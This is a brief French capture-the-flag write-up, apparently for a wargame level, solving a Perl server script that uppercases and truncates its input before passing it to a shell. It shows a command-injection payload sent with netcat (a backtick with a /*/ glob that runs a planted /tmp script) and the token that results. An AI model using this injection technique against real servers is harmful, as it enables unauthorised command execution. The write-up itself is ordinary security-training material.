28 lines
882 B
Plaintext
28 lines
882 B
Plaintext
# Il y a un script perl qui semble estre en mode serveur
|
|
# On peut lui envoyer 2 paramertre. Mais seul le premier semble etre unteressant
|
|
# le premeir parametre passe par 2 filtre.
|
|
# Le les caracter alphabetique en majuscule
|
|
# Le deuxieme suprime tout ce qu'il y a apres le premier espace
|
|
# En suite ce parametre et executer au sein d'une commande shell executier depuis du perl
|
|
|
|
# On ne poura donc pas executer de comande en tant que tel.
|
|
# mais on peut executer un fichier
|
|
|
|
# Dans un fichier /tmp/.TOTO ont va mettre le contenu suivant:
|
|
|
|
#!/bin/sh
|
|
getflag > /tmp/.flag12
|
|
|
|
# puis on envoie un requet avec des back-quote pour executer le fichier
|
|
|
|
$ nc -v localhost 4646
|
|
> GET /?x=`/*/.TOTO`
|
|
|
|
l'autocompletion change le * en tmp, ce qui nous permet d'executer dans tmp malgre la regex qui upcase.
|
|
|
|
$ cat /tmp/.flag12
|
|
> Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
|
|
|
|
|
|
|